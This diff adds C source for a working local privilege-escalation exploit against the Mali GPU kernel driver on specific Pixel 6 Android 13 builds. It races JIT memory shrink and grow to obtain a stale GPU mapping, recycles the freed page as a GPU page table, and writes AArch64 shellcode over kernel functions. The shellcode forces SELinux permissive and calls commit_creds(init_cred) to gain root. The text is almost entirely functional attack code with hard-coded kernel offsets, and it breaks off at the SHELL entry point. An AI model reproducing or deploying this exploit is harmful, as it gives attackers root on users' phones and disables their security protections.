+#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4
+
+/* Kernel offsets chosen at runtime by select_offset(); defaults match the
+ * 2301 (January 2023) Pixel 6 build. */
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2301;
+
+static uint64_t avc_deny = AVC_DENY_2301;
+
+/*
+Overwriting SELinux to permissive
+  strb wzr, [x0]
+  mov x0, #0
+  ret
+*/
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+/* AArch64 commit_creds(init_cred) shellcode, assembled by fixup_root_shell(). */
+static uint32_t root_code[8] = {0};
+
+static uint8_t atom_number = 1;    /* next job atom number; 0 is never used (see increase_atom_number) */
+static void* flush_regions[FLUSH_REGION_SIZE];  /* anonymous mappings dirtied by flush() — presumably memory pressure; see trigger() */
+static uint64_t reclaim_va[RECLAIM_SIZE];       /* CPU VAs of regions mapped by reclaim_freed_pages() */
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];  /* reserved regions: GPU VAs, replaced by CPU VAs in map_reserved() */
+static bool commit_failed = false;              /* set by mem_commit() when the shrink ioctl fails */
+static bool g_ready_commit = false;             /* gate for the racing commit thread (NOTE(review): plain bool, not atomic) */
+
+/* Userspace mirrors of the kbase UAPI memory-alias structures. */
+struct base_mem_handle {
+	struct {
+		__u64 handle;
+	} basep;
+};
+
+struct base_mem_aliasing_info {
+	struct base_mem_handle handle;
+	__u64 offset;	/* start of the aliased range within the region */
+	__u64 length;	/* extent of the aliased range */
+};
+
+/* Open a device node read/write; aborts via err() when it cannot be opened. */
+static int open_dev(char* name) {
+  int dev_fd = open(name, O_RDWR);
+  if (dev_fd == -1)
+    err(1, "cannot open %s\n", name);
+  return dev_fd;
+}
+
+/* Return the current atom number and advance the global counter, wrapping
+ * past 0 (atom number 0 is never handed out). */
+uint8_t increase_atom_number() {
+  uint8_t current = atom_number;
+  atom_number++;
+  if (atom_number == 0) {
+    atom_number = 1;
+  }
+  return current;
+}
+
+/*
+ * Finish creating a kbase context on fd: VERSION_CHECK handshake followed by
+ * SET_FLAGS. group_id is shifted to bit 3 of the flags word (presumably
+ * selecting the context's memory group — confirm against the kbase UAPI).
+ * Aborts on ioctl failure.
+ */
+void setup_mali(int fd, int group_id) {
+  struct kbase_ioctl_version_check param = {0};
+  if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
+    err(1, "version check failed\n");
+  }
+  struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+  if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
+    err(1, "set flags failed\n");
+  }
+}
+
+/*
+ * mmap the driver's tracking handle (BASE_MEM_MAP_TRACKING_HANDLE) — done
+ * right after setup_mali() for every context in this exploit. The page is
+ * mapped with no protection bits; its contents are never accessed here.
+ */
+void* setup_tracking_page(int fd) {
+  void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE);
+  if (region == MAP_FAILED) {
+    err(1, "setup tracking page failed");
+  }
+  return region;
+}
+
+/*
+ * Initialise the context's JIT allocator: va_pages of GPU VA (phys_pages set
+ * to the same), up to 255 live allocations, backed by memory group group_id.
+ * trim_level controls trimming of freed JIT regions (passed as 100 by
+ * trigger() — presumably a percentage; confirm against the kbase UAPI).
+ */
+void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) {
+  struct kbase_ioctl_mem_jit_init init = {0};
+  init.va_pages = va_pages;
+  init.max_allocations = 255;
+  init.trim_level = trim_level;
+  init.group_id = group_id;
+  init.phys_pages = va_pages;
+
+  if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) {
+    err(1, "jit init failed\n");
+  }
+}
+
+/*
+ * Submit a BASE_JD_REQ_SOFT_JIT_ALLOC atom creating JIT allocation `id` with
+ * the given VA/commit sizes (extension fixed at 0x1000 pages). The driver
+ * reports the allocated region's GPU VA at gpu_alloc_addr, which is read and
+ * returned. NOTE(review): this assumes the soft job completes before the
+ * submit ioctl returns, and that nr_extres doubles as the JIT-info count for
+ * soft jobs — both match observed behaviour but confirm against kbase.
+ */
+uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) {
+  struct base_jit_alloc_info info = {0};
+  struct base_jd_atom_v2 atom = {0};
+
+  info.id = id;
+  info.gpu_alloc_addr = gpu_alloc_addr;
+  info.va_pages = va_pages;
+  info.commit_pages = commit_pages;
+  info.extension = 0x1000;
+  info.bin_id = bin_id;
+  info.usage_id = usage_id;
+
+  atom.jc = (uint64_t)(&info);  /* soft jobs read their payload through jc */
+  atom.atom_number = atom_number;
+  atom.core_req = BASE_JD_REQ_SOFT_JIT_ALLOC;
+  atom.nr_extres = 1;
+  struct kbase_ioctl_job_submit submit = {0};
+  submit.addr = (uint64_t)(&atom);
+  submit.nr_atoms = 1;
+  submit.stride = sizeof(struct base_jd_atom_v2);
+  if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+    err(1, "submit job failed\n");
+  }
+  return *((uint64_t*)gpu_alloc_addr);
+}
+
+/*
+ * Submit a BASE_JD_REQ_SOFT_JIT_FREE atom releasing JIT allocation `id`;
+ * the free soft job reads the ID byte through the jc pointer.
+ */
+void jit_free(int fd, uint8_t atom_number, uint8_t id) {
+  uint8_t free_id = id;
+
+  struct base_jd_atom_v2 atom = {0};
+
+  atom.jc = (uint64_t)(&free_id);
+  atom.atom_number = atom_number;
+  atom.core_req = BASE_JD_REQ_SOFT_JIT_FREE;
+  atom.nr_extres = 1;
+  struct kbase_ioctl_job_submit submit = {0};
+  submit.addr = (uint64_t)(&atom);
+  submit.nr_atoms = 1;
+  submit.stride = sizeof(struct base_jd_atom_v2);
+  if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+    err(1, "submit job failed\n");
+  }
+
+}
+
+/* Change a GPU region's memory flags (mask == flags, so exactly the given
+ * bits are set). When ignore_results is non-zero, ioctl failure is silent;
+ * otherwise the process aborts. */
+void mem_flags_change(int fd, uint64_t gpu_addr, uint32_t flags, int ignore_results) {
+  struct kbase_ioctl_mem_flags_change change = {
+    .gpu_va = gpu_addr,
+    .flags = flags,
+    .mask = flags,
+  };
+  int ret = ioctl(fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &change);
+  if (!ignore_results && ret < 0) {
+    err(1, "flags_change failed\n");
+  }
+}
+
+/* Thin checked wrapper around KBASE_IOCTL_MEM_ALLOC; aborts on failure. */
+void mem_alloc(int fd, union kbase_ioctl_mem_alloc* alloc) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_ALLOC, alloc) < 0) {
+    err(1, "mem_alloc failed\n");
+  }
+}
+
+/* Thin checked wrapper around KBASE_IOCTL_MEM_ALIAS; aborts on failure. */
+void mem_alias(int fd, union kbase_ioctl_mem_alias* alias) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_ALIAS, alias) < 0) {
+    err(1, "mem_alias failed\n");
+  }
+}
+
+/* Thin checked wrapper around KBASE_IOCTL_MEM_QUERY; aborts on failure. */
+void mem_query(int fd, union kbase_ioctl_mem_query* query) {
+  if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) {
+    err(1, "mem_query failed\n");
+  }
+}
+
+/*
+ * Resize the committed backing of a GPU region via KBASE_IOCTL_MEM_COMMIT.
+ * Failure only logs and sets the global commit_failed flag: trigger() treats
+ * a failed commit as a retryable round, not a fatal error.
+ */
+void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
+  /* Fix: the second initializer was the bare expression `pages = pages`
+   * (a self-assignment that only initialized the right member by accident
+   * of declaration order); use a proper designated initializer. */
+  struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, .pages = pages};
+  if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) {
+    LOG("commit failed\n");
+    commit_failed = true;
+  }
+}
+
+/*
+ * Allocate a GPU region (va_pages VA / commit_pages committed) from memory
+ * group `group` (placed at bit 22 of the alloc flags) and mmap it into the
+ * CPU address space; GPU write access and PROT_WRITE are added unless
+ * read_only. Aborts on failure. NOTE(review): callers such as write_to()
+ * treat the returned CPU address as the region's GPU VA as well — this
+ * same-VA property must hold on the target driver.
+ */
+void* map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | (group << 22);
+  int prot = PROT_READ;
+  if (!read_only) {
+    alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
+    prot |= PROT_WRITE;
+  }
+  alloc.in.va_pages = va_pages;
+  alloc.in.commit_pages = commit_pages;
+  mem_alloc(mali_fd, &alloc);
+  void* region = mmap(NULL, 0x1000 * va_pages, prot, MAP_SHARED, mali_fd, alloc.out.gpu_va);
+  if (region == MAP_FAILED) {
+    err(1, "mmap failed");
+  }
+  return region;
+}
+
+/*
+ * Allocate `pages` of GPU memory (CPU+GPU read/write) and return its GPU VA.
+ * Unlike map_gpu(), the region is not mapped into the CPU address space.
+ * (Fix: removed the unused local `prot`.)
+ */
+uint64_t alloc_mem(int mali_fd, unsigned int pages) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR;
+  alloc.in.va_pages = pages;
+  alloc.in.commit_pages = pages;
+  mem_alloc(mali_fd, &alloc);
+  return alloc.out.gpu_va;
+}
+
+/* Release a GPU region by its GPU VA; aborts on ioctl failure. */
+void free_mem(int mali_fd, uint64_t gpuaddr) {
+  struct kbase_ioctl_mem_free mem_free = {0};
+  mem_free.gpu_addr = gpuaddr;
+  if (ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free) < 0) {
+    err(1, "free_mem failed\n");
+  }
+}
+
+/*
+ * Allocate POOL_SIZE pages in one region from memory group 1 (1 << 22 in the
+ * alloc flags), intended to empty that group's page pool; returns the GPU VA
+ * for a later release_mem_pool(). (Fix: removed the unused local `prot`.)
+ */
+uint64_t drain_mem_pool(int mali_fd) {
+  union kbase_ioctl_mem_alloc alloc = {0};
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+  alloc.in.va_pages = POOL_SIZE;
+  alloc.in.commit_pages = POOL_SIZE;
+  mem_alloc(mali_fd, &alloc);
+  return alloc.out.gpu_va;
+}
+
+/*
+ * Return the pages drained by drain_mem_pool() to the kernel. The body was a
+ * verbatim copy of free_mem() (including its error message), so delegate to
+ * it; the separate name documents intent at the call sites.
+ */
+void release_mem_pool(int mali_fd, uint64_t drain) {
+  free_mem(mali_fd, drain);
+}
+
+/*
+ * Map FLUSH_SIZE bytes of anonymous memory and dirty every byte with `idx`
+ * (presumably to apply memory pressure while probing for the freed JIT
+ * backing — see the loop in trigger()). Aborts if the mapping fails.
+ */
+void* flush(int idx) {
+  void* region = mmap(NULL, FLUSH_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  if (region == MAP_FAILED) err(1, "flush failed");
+  memset(region, idx, FLUSH_SIZE);
+  return region;
+}
+
+/*
+ * Allocate `nents` GPU regions of `pages` pages each from memory group 1 and
+ * record their GPU VAs in reserved_va; they are CPU-mapped later by
+ * map_reserved(). (Fix: removed the unused per-iteration local `prot`.)
+ */
+void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+  for (int i = 0; i < nents; i++) {
+    union kbase_ioctl_mem_alloc alloc = {0};
+    alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR | (1 << 22);
+    alloc.in.va_pages = pages;
+    alloc.in.commit_pages = pages;
+    mem_alloc(mali_fd, &alloc);
+    reserved_va[i] = alloc.out.gpu_va;
+  }
+}
+
+/*
+ * CPU-map each region reserved by reserve_pages() and REPLACE the stored GPU
+ * VA with the CPU mapping address — entries of reserved_va change meaning
+ * here (write_func() later treats them as addresses again). Aborts on mmap
+ * failure. Note the local `reserved` intentionally shadows the global array.
+ */
+void map_reserved(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
+  for (int i = 0; i < nents; i++) {
+    void* reserved = mmap(NULL, 0x1000 * pages, PROT_READ | PROT_WRITE, MAP_SHARED, mali_fd, reserved_va[i]);
+    if (reserved == MAP_FAILED) {
+      err(1, "mmap reserved failed");
+    }
+    reserved_va[i] = (uint64_t)reserved;
+  }
+}
+
+/* Low 32 bits of a 64-bit value. */
+uint32_t lo32(uint64_t x) {
+  return (uint32_t)x;
+}
+
+/* High 32 bits of a 64-bit value. */
+uint32_t hi32(uint64_t x) {
+  return (uint32_t)(x >> 32);
+}
+
+/*
+ * Encode an AArch64 ADRP instruction: "adrp xRD, <page of label>" as executed
+ * at address pc. ADRP layout: op=1 (bit 31), immlo in bits 30:29, 0b10000 in
+ * bits 28:24, immhi in bits 23:5, Rd in bits 4:0; the immediate is the
+ * page-aligned offset from pc's page to label's page.
+ */
+uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
+  int64_t page_offset = ((int64_t)(label >> 12) - (int64_t)(pc >> 12)) << 12;
+  int32_t immlo = (page_offset >> 12) & 0x3;
+  int64_t immhi = page_offset >> 14;
+  uint32_t insn = 0x90000000u;              /* op=1, bit 28 set */
+  insn |= (uint32_t)(rd & 0x1f);            /* destination register */
+  insn |= (uint32_t)immlo << 29;
+  insn |= (uint32_t)(0xffffe0 & (immhi << 5));
+  return insn;
+}
+
+/*
+ * Assemble root_code, the shellcode that will replace the function at
+ * read_enforce: it sets x0 = init_cred, x8 = commit_cred and calls x8, i.e.
+ * commit_creds(init_cred), giving the calling task init's credentials.
+ * The ADRP immediates are PC-relative, hence the read_enforce anchor.
+ */
+void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {
+
+  uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
+  //Sets x0 to init_cred
+  root_code[ADRP_INIT_INDEX] = init_adpr;
+  root_code[ADD_INIT_INDEX] = add_init;
+  //Sets x8 to commit_creds
+  root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred);
+  root_code[ADD_COMMIT_INDEX] = add_commit;
+  root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10]
+  root_code[5] = 0xd63f0100; // blr x8
+  root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10
+  root_code[7] = 0xd65f03c0; // ret
+}
+
+/* Return addr with its low 9 bits of page-frame number forced to 0x100,
+ * i.e. the address in the same 2MB block whose level-3 PTE index is 0x100. */
+uint64_t set_addr_lv3(uint64_t addr) {
+  uint64_t pfn = ((addr >> PAGE_SHIFT) & ~0x1FFUL) | 0x100UL;
+  return pfn << PAGE_SHIFT;
+}
+
+/* Index of addr's entry in the page table at `level` (0 = top, 3 = leaf);
+ * each level resolves 9 bits of the virtual page frame number. */
+static inline uint64_t compute_pt_index(uint64_t addr, int level) {
+  return (addr >> (PAGE_SHIFT + (3 - level) * 9)) & 0x1FF;
+}
+
+/*
+ * Submit a MALI_JOB_TYPE_WRITE_VALUE hardware job writing `value` (with the
+ * width selected by `type`) to GPU address gpu_addr, then sleep briefly to
+ * let the job land. The job chain lives in a fresh one-page GPU mapping;
+ * NOTE(review): that page is never unmapped — a deliberate/benign leak for a
+ * short-lived exploit process. (Fix: removed the unused local `section`.)
+ */
+void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, enum mali_write_value_type type) {
+  void* jc_region = map_gpu(mali_fd, 1, 1, false, 0);
+  struct MALI_JOB_HEADER jh = {0};
+  jh.is_64b = true;
+  jh.type = MALI_JOB_TYPE_WRITE_VALUE;
+
+  struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
+  payload.type = type;
+  payload.immediate_value = value;
+  payload.address = gpu_addr;
+
+  /* header at offset 0, payload at byte offset 32 (8 * sizeof(uint32_t)) */
+  MALI_JOB_HEADER_pack((uint32_t*)jc_region, &jh);
+  MALI_WRITE_VALUE_JOB_PAYLOAD_pack((uint32_t*)jc_region + 8, &payload);
+  struct base_jd_atom_v2 atom = {0};
+  atom.jc = (uint64_t)jc_region;
+  atom.atom_number = atom_number;
+  atom.core_req = BASE_JD_REQ_CS;
+  struct kbase_ioctl_job_submit submit = {0};
+  submit.addr = (uint64_t)(&atom);
+  submit.nr_atoms = 1;
+  submit.stride = sizeof(struct base_jd_atom_v2);
+  if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
+    err(1, "submit job failed\n");
+  }
+  usleep(10000);
+}
+
+/*
+ * Spray `shellcode` (code_size 32-bit words) over the kernel function at
+ * virtual offset `func`: for every reserved region, visit each page, redirect
+ * it through set_addr_lv3() to the address whose level-3 PTE slot we control,
+ * and issue one GPU write per instruction word (last word first, so the
+ * function entry is overwritten only once the tail is in place).
+ * (Fix: removed the unused locals start_idx/end_idx and the signed/unsigned
+ * loop-counter mismatch.)
+ */
+void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
+  uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
+  uint64_t curr_overwrite_addr = 0;
+  for (uint64_t i = 0; i < size; i++) {
+    uint64_t base = reserved[i];
+    uint64_t end = reserved[i] + RESERVED_SIZE * 0x1000;
+    for (uint64_t addr = base; addr < end; addr += 0x1000) {
+      uint64_t overwrite_addr = set_addr_lv3(addr);
+      if (curr_overwrite_addr != overwrite_addr) {
+        LOG("overwrite addr : %lx %lx\n", overwrite_addr + func_offset, func_offset);
+        curr_overwrite_addr = overwrite_addr;
+        for (int code = code_size - 1; code >= 0; code--) {
+          write_to(mali_fd, overwrite_addr + func_offset + code * 4, shellcode[code], increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
+        }
+        usleep(300000);
+      }
+    }
+  }
+}
+
+/*
+ * After the SELinux patch, read back /sys/fs/selinux/enforce (sleeping 3s
+ * first to let the overwrite take effect). Returns the status character:
+ * '0' (permissive) or '1' (enforcing), or '2' when it cannot be read.
+ * (Fix: the open and read results were previously unchecked; a failed open
+ * passed -1 to read/close and a short read returned stale stack data.)
+ */
+int run_enforce() {
+  char result = '2';
+  sleep(3);
+  int enforce_fd = open("/sys/fs/selinux/enforce", O_RDONLY);
+  if (enforce_fd >= 0) {
+    if (read(enforce_fd, &result, 1) != 1) {
+      result = '2';
+    }
+    close(enforce_fd);
+  }
+  LOG("result %d\n", result);
+  return result;
+}
+
+/*
+ * Select the kernel offsets matching the device's build fingerprint and
+ * precompute the root shellcode. Aborts when the build is not one of the
+ * supported Pixel 6 (oriole) releases — hard-coded offsets on any other
+ * kernel would corrupt unrelated memory.
+ * (Fixes: zero-initialise the fingerprint buffer and check the property
+ * lookup so a missing property cannot feed garbage to strcmp; use errx()
+ * instead of err() since no errno value is involved in a failed match.)
+ */
+void select_offset() {
+  char fingerprint[256] = {0};
+  int len = __system_property_get("ro.build.fingerprint", fingerprint);
+  if (len <= 0) {
+    errx(1, "unable to read ro.build.fingerprint");
+  }
+  LOG("fingerprint: %s\n", fingerprint);
+  if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+    avc_deny = AVC_DENY_2211;
+    sel_read_enforce = SEL_READ_ENFORCE_2211;
+    fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211);
+    return;
+  }
+  if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+    avc_deny = AVC_DENY_2212;
+    sel_read_enforce = SEL_READ_ENFORCE_2212;
+    fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212);
+    return;
+  }
+  if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) {
+    avc_deny = AVC_DENY_2301;
+    sel_read_enforce = SEL_READ_ENFORCE_2301;
+    fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301);
+    return;
+  }
+  errx(1, "unable to match build id");
+}
+
+/* Write the raw value 2 back into the hijacked PGD slot at OVERWRITE_INDEX so
+ * the stale mapping to the patched kernel pages is removed.
+ * NOTE(review): the meaning of the value 2 is not visible here — confirm
+ * against the GPU MMU table format. */
+void cleanup(int mali_fd, uint64_t pgd) {
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+}
+
+/*
+ * With `pgd` being a GPU alias of one of our own page-table pages: point
+ * PTE slot OVERWRITE_INDEX at the page containing avc_deny (0x443 appears to
+ * be the PTE attribute bits for a writable mapping — NOTE(review): confirm
+ * the encoding), rewrite avc_deny with the `permissive` shellcode through
+ * the second context's reserved mappings, trigger it by causing an SELinux
+ * check (opening /dev/kmsg), then repeat for sel_read_enforce with the
+ * commit_creds chain in root_code.
+ */
+void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
+  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+  usleep(100000);
+  //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+  write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
+
+  //Triggers avc_denied to disable SELinux
+  open("/dev/kmsg", O_RDONLY);
+
+  uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+  write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+  //Call commit_creds to overwrite process credentials to gain root
+  write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
+}
+
+/*
+ * Thread body for the racing commit: spin until trigger() sets
+ * g_ready_commit, pause briefly, then shrink the JIT region via mem_commit().
+ * Arguments arrive as a uint64_t[3] of {mali_fd, gpu_addr, pages}.
+ * NOTE(review): g_ready_commit is a plain bool, so this busy-wait is formally
+ * a data race; an atomic_bool (or volatile at minimum) would be safer.
+ */
+void* shrink_jit_mem(void* args) {
+  uint64_t* arguments = (uint64_t*)args;
+  int mali_fd = arguments[0];
+  uint64_t gpu_addr = arguments[1];
+  uint64_t pages = arguments[2];
+  while (!g_ready_commit) {};
+  usleep(10000);
+  mem_commit(mali_fd, gpu_addr, pages);
+  return NULL;
+}
+
+/*
+ * Map RECLAIM_SIZE single-page GPU regions from the JIT memory group, hoping
+ * to pick up the freed JIT backing pages, and zero each region's first qword
+ * so stale data cannot be mistaken for the 0x41+ markers later written by
+ * trigger() and searched for by find_freed_region().
+ */
+void reclaim_freed_pages(int mali_fd) {
+  for (int i = 0; i < RECLAIM_SIZE; i++) {
+    reclaim_va[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, JIT_GROUP_ID);
+    uint64_t* this_va = (uint64_t*)(reclaim_va[i]);
+    *this_va = 0;
+  }
+}
+
+/*
+ * Scan the reclaimed regions for one whose first qword holds a marker
+ * (0x41 + j) written through the stale GPU mapping in trigger(). On success
+ * returns the marker offset j and sets *idx to the reclaim slot; otherwise
+ * returns (uint64_t)-1 with *idx left at -1. NOTE: the -1 sentinel in an
+ * unsigned return still compares equal to -1 at the call site via the usual
+ * arithmetic conversions.
+ */
+uint64_t find_freed_region(int* idx) {
+  *idx = -1;
+  for (int i = 0; i < RECLAIM_SIZE; i++) {
+    uint64_t* this_region = (uint64_t*)(reclaim_va[i]);
+    uint64_t val = *this_region;
+    if (val >= 0x41 && val < 0x41 + FREED_NUM) {
+      *idx = i;
+      return val - 0x41;
+    }
+  }
+  return -1;
+}
+
+/*
+ * One attempt at the GHSL-2023-005 JIT shrink/grow race. Returns 0 when the
+ * kernel has been patched (SELinux permissive, credentials rooted), -1 when
+ * the round failed and may be retried. mali_fd2 is the second, pre-prepared
+ * context whose reserved regions receive the shellcode writes.
+ * NOTE(review): on the loop-exhausted failure path the flush_regions
+ * mappings and the tracking/gpu_alloc mappings are not unmapped — leaks that
+ * only matter if the caller retries many times in one process.
+ */
+int trigger(int mali_fd2) {
+
+  int mali_fd = open_dev(MALI);
+
+  setup_mali(mali_fd, 0);
+
+  void* tracking_page = setup_tracking_page(mali_fd);
+  jit_init(mali_fd, JIT_PAGES, 100, JIT_GROUP_ID);
+
+  /* reset per-attempt state: trigger() may run again after a failed round */
+  g_ready_commit = false;
+  commit_failed = false;
+  atom_number = 1;
+  void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0);
+  uint64_t first_jit_id = 1;
+  uint64_t second_jit_id = 2;
+
+  /* carve two JIT allocations expected to sit back-to-back */
+  uint64_t jit_addr = jit_allocate(mali_fd, increase_atom_number(), first_jit_id, FREED_NUM, 0, 0, 0, (uint64_t)gpu_alloc_addr);
+  uint64_t jit_addr2 = jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, 512 - FREED_NUM, 1, 1, (uint64_t)gpu_alloc_addr);
+
+  /* bail out unless the layout is exactly the one the race depends on */
+  if (jit_addr % (512 * 0x1000) != 0 || jit_addr2 < jit_addr || jit_addr2 - jit_addr != FREED_NUM * 0x1000) {
+    LOG("incorrect memory layout\n");
+    LOG("jit_addr %lx %lx\n", jit_addr, jit_addr2);
+    err(1, "incorrect memory layout\n");
+  }
+
+  jit_free(mali_fd, increase_atom_number(), second_jit_id);
+  pthread_t thread;
+  uint64_t args[3];
+  args[0] = mali_fd;
+  args[1] = jit_addr2;
+  args[2] = 0;
+
+  /* the race: a second thread shrinks (commits to 0 pages) the region while
+   * this thread re-allocates it with a larger commit */
+  pthread_create(&thread, NULL, &shrink_jit_mem, (void*)&(args[0]));
+  g_ready_commit = true;
+  jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, GROW_SIZE, 1, 1, (uint64_t)gpu_alloc_addr);
+
+  pthread_join(thread, NULL);
+  if (commit_failed) {
+    close(mali_fd);
+    return -1;
+  }
+  jit_free(mali_fd, increase_atom_number(), second_jit_id);
+  for (int i = 0; i < FLUSH_REGION_SIZE; i++) {
+    union kbase_ioctl_mem_query query = {0};
+    query.in.gpu_addr = jit_addr2;
+    query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE;
+    flush_regions[i] = flush(i);
+    /* when the region can no longer be queried, its backing has been freed
+     * while our stale GPU mapping still points at it */
+    if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) {
+      LOG("region freed\n");
+      reclaim_freed_pages(mali_fd);
+      uint64_t start_addr = jit_addr2 + 0x1000 * (512 - FREED_NUM);
+      /* tag each dangling page through the stale mapping so the reclaimed
+       * alias can be identified from the CPU side */
+      for (int j = 0; j < FREED_NUM; j++) {
+        write_to(mali_fd, start_addr + j * 0x1000, 0x41 + j, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+      }
+      int idx = -1;
+      uint64_t offset = find_freed_region(&idx);
+      if (offset == -1) {
+        LOG("unable to find region\n");
+        for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+        close(mali_fd);
+        return -1;
+      }
+      LOG("found region %d at %lx\n", idx, start_addr + offset * 0x1000);
+      /* recycle the aliased page into a GPU page table: drain/release the
+       * pool, drop our mapping, then fault in the reserved regions so the
+       * driver allocates page tables from the just-released pages */
+      uint64_t drain = drain_mem_pool(mali_fd);
+      release_mem_pool(mali_fd, drain);
+      munmap((void*)(reclaim_va[idx]), 0x1000);
+      mmap(NULL, 0x1000 * 0x1000, PROT_READ|PROT_WRITE,
+          MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+      map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
+      for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE);
+
+      /* the stale GPU alias now overlaps a live page table: patch the kernel */
+      uint64_t pgd = start_addr + offset * 0x1000;
+      write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0]));
+      run_enforce();
+      cleanup(mali_fd, pgd);
+      return 0;
+    }
+  }
+  close(mali_fd);
+  return -1;
+}
+
+#ifdef SHELL
+
+/* Stand-alone (SHELL build) entry point: unbuffer stdio, select offsets for
+ * the running build, prepare the second Mali context (memory group 1) whose
